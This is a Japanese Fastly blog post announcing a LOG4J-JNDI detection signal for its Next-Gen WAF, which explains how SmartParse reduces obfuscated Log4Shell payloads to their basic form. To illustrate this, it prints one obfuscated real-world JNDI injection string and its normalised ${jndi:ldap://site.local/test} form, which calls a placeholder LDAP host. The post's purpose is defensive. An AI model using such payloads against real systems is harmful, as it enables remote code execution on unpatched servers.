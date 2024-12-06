ビジネスの未来は開発者から始まります

詳細情報
企業 優れたオンライン体験を支えるチーム ネットワークマップ 最先端のインターネットを支える新しいアーキテクチャ 業界アナリストの声 Fastly に対する業界アナリストの評価 ニュース 最新情報・企業ニュース プラットフォーム より高速かつ安全で魅力的なデジタルエクスペリエンスを可能にするプラットフォーム お客様事例 お客様のサクセスストリー イベント Fastly 関連イベントのお知らせ 採用情報 一緒に優れたインターネットを構築

Fastly エッジクラウドプラットフォーム

すべてのプロダクトを表示
コンテンツ配信 (CDN) パーソナライズされたエクスペリエンスをグローバルに高速配信 ライブストリーミング シームレスなライブストリーミング体験 ストリーミング動画 (VoD) 卓越したオンデマンド動画エクスペリエンス Media Shield マルチ CDN のデプロイを最適化 On-the-Fly Packager リアルタイムでオンデマンドの動画コンテンツを動的にパッケージ化 Image Optimizer エッジで画像の高速処理を実現 ロードバランサー ルーティングをきめ細かくコントロール TLS 暗号化 トランスポート・レイヤー・セキュリティ管理の複雑性を軽減 Origin Connect Fastly に直接接続 IP アドレス IP アドレスを簡単に管理 HTTP/3 と QUIC 最新のプロトコル ドメインリサーチ API 即時かつ正確なドメイン名検出 Object Storage 送信量ゼロで大容量ファイルにエッジで直接アクセス
Next-Gen WAF 環境を問わない最先端の Web アプリ/API のセキュリティソリューション ボット管理 効果的にボット攻撃を検出して脅威をブロック DDoS Protection ビジネスに支障をきたす分散型攻撃を自動的に軽減 API セキュリティ API エンドポイントを保護 Client-Side Protection クライアントサイド攻撃からの防御 AI ボット管理 AI ボットにより Web サイトのコンテンツスクレイピングを阻止
エッジコンピューティング アプリをエッジに展開 — 私たちのインスタントプラットフォームが、ユーザーに素晴らしいエクスペリエンスを提供するための開発を支援します キーバリューストア 最も高速なキーバリューストアでありながら、使い慣れたデータベースツールと同じくらい簡単に使用できます WebSockets と Fanout 完全なパーソナライズ機能と簡単な設定が可能な、リアルタイムメッセージングをグローバル規模で提供 開発者 SDK Fastly のプロダクトの構築に使用しているのと同じサービスをプログラム Enterprise Serverless オープンスタンダードで構築され、Fastly の全プロダクトと統合可能な最強サーバーレスプラットフォーム AI セマンティックキャッシングで AI ワークロードを加速し、効率性を向上させます Object Storage 送信量ゼロで大容量ファイルにエッジで直接アクセス プログラマブルキャッシュ 当社のコンテンツ配信ネットワークを支える伝説的なキャッシュ機能に、プログラムでフルアクセスできます。 MCPサーバー AI を活用した Fastly Service のコントロール。
リアルタイムログ リアルタイムでログをストリーミング・分析 Edge Observer トラフィックのライブデータと履歴データを確認 Domain Inspector ドメインレベルのインサイトにアクセス Origin Inspector オリジンとエッジ間の完全なインサイト アラート サービス関連の指標に関する通知を作成 Log Explorer &amp; Insights 実用的なインサイトとのインタラクション

優れた結果をもたらす卓越したサービス

すべてのサービスを見る
プロフェッショナルサービス デリバリーサービスのマイグレーション/最適化を Fastly のエキスパートがサポート ライブ・エンターテインメント・サービス 視聴者の規模に合わせてライブストリーミング体験をスケーリング サポートプラン 一貫したワールドクラスのサポート マネージドCDN コントロールと柔軟性を最大化 マネージドセキュリティ プロによる Web アプリケーションの保護 カスタマーサポート Fastly のサポートチームがお客様と共にビジネスの成長を支援

革新的なデジタルソリューション

ソリューションの詳細
ストリーミングメディア 魅力的なライブ/オンデマンドストリーミング 新興メディア 新興メディア企業向けの高パフォーマンスソリューション デジタルパブリッシング リアルタイムの報道で読者エクスペリエンスを向上 eコマース 大規模にパーソナライズされた高速エクスペリエンス ファイナンスサービス 統合型セキュリティ対策で顧客データを保護 ハイテク ビジネスの成長に合わせてパフォーマンスを瞬時にスケールアップ トラベル &amp; サービス カスタマイズされたオンライン体験を旅行者に提供 オンライン教育 セキュアな学習体験を大規模に実現 ゲーム 超高速で安全なゲームダウンロードでプレイヤーの次の勝利を後押し
インフラコストの削減 予測しやすいクラウドの低コスト化を実現 マルチクラウドの最適化 クラウドリソースを統合して複雑性を軽減 お客様の信頼 お客様の信頼獲得に向けた Fastly の取り組みをご紹介 プライバシー保護 ユーザーのデータを保護する方法をご覧ください サステナビリティダッシュボード Fastlyプラットフォームの電力使用量と温室効果ガス排出量を確認する

素晴らしいエクスペリエンスの構築に取り組む開発者を支援

Fastly を無料でお試しください
開発者 今すぐ素晴らしいアイディアを実現してみませんか？ Fast Forward 信頼性の高いインターネットの構築 開発ツール エッジを効かせ、コラボレーションを促進する開発ツール 開発者 SDK Fastly のプロダクトの構築に使用しているのと同じサービスをプログラム コミュニティ 世界中の開発者が集うコミュニティに参加 サインアップ 無料の開発者アカウントを作成する

Fastly を活用して高速かつ安全で魅力的なインターネットの構築を支援

Fastly とパートナーを組む理由 高速かつ安全で魅力的なエクスペリエンスの実現をサポート クラウドパートナー クラウドサービスと Fastly を統合するメリット チャネルパートナー Fastly 製品でソシューションや機能を強化 技術・統合パートナー パートナーエコシステムの詳細
パートナーポータルへのログイン Fastly パートナー向けリソースへのアクセス パートナー登録 Fastly 製品の再販/リファーラルを通じてビジネスを強化 パートナーを見つける ニーズに合わせて適切なパートナーをご紹介

信頼できる Fastly のサポート

ドキュメント Fastly の機能を最大限に活用 リソースライブラリ データシートやレポートなどをご覧ください Fastly Academy Fastly 製品に関する実践的な e ラーニングコース ラーニングセンター インターネットテクノロジーの詳細 ブログ 最新のアイディアやトレンドをご紹介 セキュリティ調査 セキュリティ強化に役立つ調査 Fastly の視点 専門家と業界のインサイトの詳細を見る
サポートセンター お困りですか？ お問い合わせ お気軽にご連絡ください
ブログに戻る

フォロー&ご登録

お知らせ : LOG4J-JNDI 攻撃シグナルが利用可能になりました

Daniel Corbett

プリンシパルプロダクトマネージャー

セキュリティプロダクト

背景

2021年12月、CVE-2021-44228 (通称 Log4Shell) が業界を騒がせました。Log4j ライブラリは広く使用されているため、さまざまなソフトウェアが脅威にさらされました。さらに悪いことに、ログとやり取りするアプリケーションがこの攻撃の影響を受けたため、ペイロードの1つがログ用パイプラインを通過する場合、攻撃者が直接アクセスできないサービスでさえ危機にさらされる事態となりました。

Fastly のカスタマー・セキュリティ・オペレーション・センター (CSOC) とセキュリティリサーチチームは、すべてのお客様に仮想パッチを迅速にデプロイすることに協力して取り組みました。Fastly は社内インシデントレスポンスチームを立ち上げ、お客様がこの重大な脅威の影響を受けないよう24時間体制でモニタリングを実施しました。その数日後、さまざまな Log4Shell 攻撃に関するデータとインサイトを公開しました。モニタリング中は、一般的な WAF パターンによる検出を回避しようとする攻撃者によって開発された回避技術によってペイロードのバリアントが変異することを確認しました。

SmartParse の拡張

Fastly の攻撃シグナルと異常シグナルはすべて SmartParse 技術を活用していますが、素早いレスポンスが必要なケースでは、正規表現に基づく仮想パッチを実装することもあります。この場合、お客様にパッチを数分以内に適用することができます。ただし、今回は作成されるバリアントの数が非常に多かったため、Fastly では、SmartParse の能力を活用してこれらの攻撃を検出する方がより効率的であると考えました。

Fastly のエンジニアは舞台裏で対策作業に取り組み、SmartParse を拡張し、複雑な Log4Shell のペイロードを取得して最も基本的な形式にまで落とし込むことを可能にするメソッドを開発しました。ここでは、例を示すために、実際に使用された複雑なペイロードの1つを挙げます。

${${uPBeLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}${fGX:L:KhSyJ:-:}${E:o:wsyhug:LGVMcx:-l}${Prz:-d}${d:PeH:OmFo:GId:-a}${NLsTHo:-p}${uwF:eszIV:QSvP:-:}${JF:l:U:-/}${AyEC:rOLocm:-}/site.local/test}

SmartParse を使用すると、これを次のような最も基本的な形式に変換できます。

${jndi:ldap://site.local/test}

高度な Log4Shell 攻撃の検出と保護

SmartParse を活用すると、誤検出を最小限またはゼロに抑えながら、絶えず増え続ける正規表現パターンを管理したり、それらに依存したりする必要なしに、高度で正確な検出が可能になります。

Fastly は、この機能を利用して Log4Shell 攻撃を阻止する新しい攻撃シグナル (LOG4J-JNDI) を、まず Fastly セキュリティラボのプログラム内で適用しました。この攻撃シグナルを数か月間にわたって観察した後、すべてのお客様を対象に一般公開版を公式にリリースしました。これにより、正規表現に基づくマッチングよりも検出が改善されるとともに、その他の攻撃シグナルと組み合わせて、組織または企業レベルでルールを構築および作成し、組織全体にわたってグローバルにレスポンスポリシーを迅速に導入することも可能になります。

次のステップ

Fastly 次世代 WAF のお客様は、コンソールにログインすると、リクエストフィード内に新しい LOG4J-JNDI 攻撃シグナルが追加されていることをすぐにご確認いただけます。この攻撃シグナルは、デフォルトではしきい値ベースのブロックを使用するよう有効化されており、お客様ご自身で必要に応じて適切なレベルに調整することも、インスタントブロックを実装することもできます。 

WAF を導入していないお客様や、Log4Shell 攻撃または OWASP インジェクション攻撃を検出するのに正規表現のパターンマッチングを利用する従来型の WAF を使用しているお客様には、Fastly 次世代 WAF (Powered by Signal Sciences) のデモを行い、従来型の WAF に伴う煩雑な管理や誤検出の心配がない最先端のソリューションをご紹介いたします。詳細については、Fastly のセキュリティエキスパートまでお問い合わせください。

始める準備はできましたか?

ぜひご連絡ください
専門家に相談する